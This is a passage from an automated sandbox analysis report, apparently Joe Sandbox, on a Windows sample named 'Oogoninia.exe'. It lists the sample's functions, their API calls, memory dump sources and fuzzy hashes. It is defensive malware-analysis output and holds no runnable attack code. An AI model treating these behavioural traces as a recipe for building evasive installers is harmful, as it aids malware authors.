                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Sleep
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3472027048-0
                                                                                                                                                                                    • Opcode ID: 5103c2e833fb6cec983ac643f83c5405fcf5b56718913b7927d61a5481dde75b
                                                                                                                                                                                    • Instruction ID: a8a1054ff6e124a16992140d9831d4e67a861e682019e3b6a28de944f62df8e5
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5103c2e833fb6cec983ac643f83c5405fcf5b56718913b7927d61a5481dde75b
                                                                                                                                                                                    • Instruction Fuzzy Hash: B5D05E73B141519BD750EBB8BAC445E77E4EB403257304837E502E2091E67989429618
                                                                                                                                                                                    Function 10001215 Relevance: 1.3, APIs: 1, Instructions: 4memoryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GlobalAlloc.KERNELBASE(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1196297422.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1196258164.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1196329175.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1196354573.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_10000000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AllocGlobal
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3761449716-0
                                                                                                                                                                                    • Opcode ID: 6989041179a6ec659f8410a82a3610e1053cc9f4ca9d652552d89decbf4b4a90
                                                                                                                                                                                    • Instruction ID: 35b308b173d9b0532f6cde55f5bface33093279d7ce3c78a2cc6db588f634b90
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6989041179a6ec659f8410a82a3610e1053cc9f4ca9d652552d89decbf4b4a90
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6CA002B1945620DBFE429BE08D9EF1B3B25E748781F01C040E315641BCCA754010DF39

                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                    Function 004050F7 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282windowclipboardmemoryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDlgItem.USER32(?,00000403), ref: 00405156
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00405165
                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 004051A2
                                                                                                                                                                                    • GetSystemMetrics.USER32(00000002), ref: 004051A9
                                                                                                                                                                                    • SendMessageA.USER32(?,0000101B,00000000,?), ref: 004051CA
                                                                                                                                                                                    • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004051DB
                                                                                                                                                                                    • SendMessageA.USER32(?,00001001,00000000,?), ref: 004051EE
                                                                                                                                                                                    • SendMessageA.USER32(?,00001026,00000000,?), ref: 004051FC
                                                                                                                                                                                    • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040520F
                                                                                                                                                                                    • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405231
                                                                                                                                                                                    • ShowWindow.USER32(?,00000008), ref: 00405245
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 00405266
                                                                                                                                                                                    • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405276
                                                                                                                                                                                    • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040528F
                                                                                                                                                                                    • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 0040529B
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003F8), ref: 00405174
                                                                                                                                                                                      • Part of subcall function 00403FBA: SendMessageA.USER32(00000028,?,00000001,00403DEB), ref: 00403FC8
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004052B7
                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_0000508B,00000000), ref: 004052C5
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004052CC
                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 004052EF
                                                                                                                                                                                    • ShowWindow.USER32(?,00000008), ref: 004052F6
                                                                                                                                                                                    • ShowWindow.USER32(00000008), ref: 0040533C
                                                                                                                                                                                    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405370
                                                                                                                                                                                    • CreatePopupMenu.USER32 ref: 00405381
                                                                                                                                                                                    • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405396
                                                                                                                                                                                    • GetWindowRect.USER32(?,000000FF), ref: 004053B6
                                                                                                                                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053CF
                                                                                                                                                                                    • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040540B
                                                                                                                                                                                    • OpenClipboard.USER32(00000000), ref: 0040541B
                                                                                                                                                                                    • EmptyClipboard.USER32 ref: 00405421
                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000042,?), ref: 0040542A
                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00405434
                                                                                                                                                                                    • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405448
                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00405461
                                                                                                                                                                                    • SetClipboardData.USER32(00000001,00000000), ref: 0040546C
                                                                                                                                                                                    • CloseClipboard.USER32 ref: 00405472
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                                                    • String ID: @y
                                                                                                                                                                                    • API String ID: 590372296-2793234042
                                                                                                                                                                                    • Opcode ID: fb478b241302d14890c8e569f688314f17ac97b328ad1953f1dfc7460e5c88c7
                                                                                                                                                                                    • Instruction ID: 669047f9f67e304dd712f5be3c8e464dbcc99e7ae4a165c688d328355b6db051
                                                                                                                                                                                    • Opcode Fuzzy Hash: fb478b241302d14890c8e569f688314f17ac97b328ad1953f1dfc7460e5c88c7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9DA16970900249BFEF119FA0DD89EAE7F79EB08354F00806AFA05B61A0C7795E50DF69
                                                                                                                                                                                    Function 00404936 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003F9), ref: 0040494E
                                                                                                                                                                                    • GetDlgItem.USER32(?,00000408), ref: 00404959
                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00000002), ref: 004049A3
                                                                                                                                                                                    • LoadBitmapA.USER32(0000006E), ref: 004049B6
                                                                                                                                                                                    • SetWindowLongA.USER32(?,000000FC,00404F2D), ref: 004049CF
                                                                                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004049E3
                                                                                                                                                                                    • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004049F5
                                                                                                                                                                                    • SendMessageA.USER32(?,00001109,00000002), ref: 00404A0B
                                                                                                                                                                                    • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404A17
                                                                                                                                                                                    • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404A29
                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00404A2C
                                                                                                                                                                                    • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404A57
                                                                                                                                                                                    • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404A63
                                                                                                                                                                                    • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404AF8
                                                                                                                                                                                    • SendMessageA.USER32(?,0000110A,?,00000000), ref: 00404B23
                                                                                                                                                                                    • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404B37
                                                                                                                                                                                    • GetWindowLongA.USER32(?,000000F0), ref: 00404B66
                                                                                                                                                                                    • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404B74
                                                                                                                                                                                    • ShowWindow.USER32(?,00000005), ref: 00404B85
                                                                                                                                                                                    • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404C82
                                                                                                                                                                                    • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404CE7
                                                                                                                                                                                    • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404CFC
                                                                                                                                                                                    • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404D20
                                                                                                                                                                                    • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404D40
                                                                                                                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 00404D55
                                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 00404D65
                                                                                                                                                                                    • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404DDE
                                                                                                                                                                                    • SendMessageA.USER32(?,00001102,?,?), ref: 00404E87
                                                                                                                                                                                    • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404E96
                                                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EB6
                                                                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00404F04
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003FE), ref: 00404F0F
                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00404F16
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                    • String ID: $M$N
                                                                                                                                                                                    • API String ID: 1638840714-813528018
                                                                                                                                                                                    • Opcode ID: 56b3b82b533b733a33c13492c2ad1bc1f2630ac234a6e512c7e667a37d25cb4c
                                                                                                                                                                                    • Instruction ID: 10d6cb261f95093856db0383de4589f8155b4d68da151c8c89fd000e0678f767
                                                                                                                                                                                    • Opcode Fuzzy Hash: 56b3b82b533b733a33c13492c2ad1bc1f2630ac234a6e512c7e667a37d25cb4c
                                                                                                                                                                                    • Instruction Fuzzy Hash: AB027CB0900209AFEB14DF64DC85AAE7BB9FB84314F10817AF610BA2E1D7789D51CF58
                                                                                                                                                                                    Function 004043C3 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 274stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003FB), ref: 00404412
                                                                                                                                                                                    • SetWindowTextA.USER32(00000000,?), ref: 0040443C
                                                                                                                                                                                    • SHBrowseForFolderA.SHELL32(?,0079D918,?), ref: 004044ED
                                                                                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 004044F8
                                                                                                                                                                                    • lstrcmpiA.KERNEL32(Call,0079E540), ref: 0040452A
                                                                                                                                                                                    • lstrcatA.KERNEL32(?,Call), ref: 00404536
                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404548
                                                                                                                                                                                      • Part of subcall function 0040557A: GetDlgItemTextA.USER32(?,?,00000400,0040457F), ref: 0040558D
                                                                                                                                                                                      • Part of subcall function 0040600B: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Oogoninia.exe",766B3410,C:\Users\user\AppData\Local\Temp\,00000000,0040315B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403370), ref: 00406063
                                                                                                                                                                                      • Part of subcall function 0040600B: CharNextA.USER32(?,?,?,00000000), ref: 00406070
                                                                                                                                                                                      • Part of subcall function 0040600B: CharNextA.USER32(?,"C:\Users\user\Desktop\Oogoninia.exe",766B3410,C:\Users\user\AppData\Local\Temp\,00000000,0040315B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403370), ref: 00406075
                                                                                                                                                                                      • Part of subcall function 0040600B: CharPrevA.USER32(?,?,766B3410,C:\Users\user\AppData\Local\Temp\,00000000,0040315B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403370), ref: 00406085
                                                                                                                                                                                    • GetDiskFreeSpaceA.KERNEL32(0079D510,?,?,0000040F,?,0079D510,0079D510,?,00000001,0079D510,?,?,000003FB,?), ref: 00404606
                                                                                                                                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404621
                                                                                                                                                                                      • Part of subcall function 0040477A: lstrlenA.KERNEL32(0079E540,0079E540,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404695,000000DF,00000000,00000400,?), ref: 00404818
                                                                                                                                                                                      • Part of subcall function 0040477A: wsprintfA.USER32 ref: 00404820
                                                                                                                                                                                      • Part of subcall function 0040477A: SetDlgItemTextA.USER32(?,0079E540), ref: 00404833
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                    • String ID: @y$A$C:\Users\user\slavelivets$Call
                                                                                                                                                                                    • API String ID: 2624150263-2138057794
                                                                                                                                                                                    • Opcode ID: 3d12c395db0b8a5e031a22e6692dd266f1d5deac6801d88cb2d33c24727f66a7
                                                                                                                                                                                    • Instruction ID: b79cf5757fdebc40129ea8bf430174fd55c22843b8008fc959c2d10819856cf3
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3d12c395db0b8a5e031a22e6692dd266f1d5deac6801d88cb2d33c24727f66a7
                                                                                                                                                                                    • Instruction Fuzzy Hash: A3A170B1900209ABDB11EFA5CC45BAF77B8EF85314F10843BF611B62D1E77C9A418B69
                                                                                                                                                                                    Function 004020CD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CoCreateInstance.OLE32(00407408,?,00000001,004073F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040214C
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,004073F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F8
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • C:\Users\user\slavelivets, xrefs: 0040218C
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharCreateInstanceMultiWide
                                                                                                                                                                                    • String ID: C:\Users\user\slavelivets
                                                                                                                                                                                    • API String ID: 123533781-1403250623
                                                                                                                                                                                    • Opcode ID: 9afc873253917f5f4e985fd398202ffa23981bb55cb45aee65fcfdfca240a494
                                                                                                                                                                                    • Instruction ID: 3b959fe0d73b6f2ff8ba1a3dad26e84ad0429d5bc67268e837327fa781b0949d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9afc873253917f5f4e985fd398202ffa23981bb55cb45aee65fcfdfca240a494
                                                                                                                                                                                    • Instruction Fuzzy Hash: 705116B5E00208BFCB00DFE4C988A9DBBB6EF48314B2445AAF515FB2D1DA799941CB54
                                                                                                                                                                                    Function 0040270B Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040271A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileFindFirst
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1974802433-0
                                                                                                                                                                                    • Opcode ID: fce0c61a2aa14f88a491396f2313ca711f415b7b1927e6be8b43a2417c2e171c
                                                                                                                                                                                    • Instruction ID: 3ccff3199aeab2db1e2dd923352da36f4292fa18247536f83ce369c7762b159a
                                                                                                                                                                                    • Opcode Fuzzy Hash: fce0c61a2aa14f88a491396f2313ca711f415b7b1927e6be8b43a2417c2e171c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 76F05572604110EFD700EBA49A089FEB768DF15324FA0407BF181F20C0CBBC8A429B2A
                                                                                                                                                                                    Function 00403AB2 Relevance: 59.8, APIs: 32, Strings: 2, Instructions: 345windowstringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403AEE
                                                                                                                                                                                    • ShowWindow.USER32(?), ref: 00403B0B
                                                                                                                                                                                    • DestroyWindow.USER32 ref: 00403B1F
                                                                                                                                                                                    • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403B3B
                                                                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 00403B5C
                                                                                                                                                                                    • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403B70
                                                                                                                                                                                    • IsWindowEnabled.USER32(00000000), ref: 00403B77
                                                                                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 00403C25
                                                                                                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 00403C2F
                                                                                                                                                                                    • SetClassLongA.USER32(?,000000F2,?), ref: 00403C49
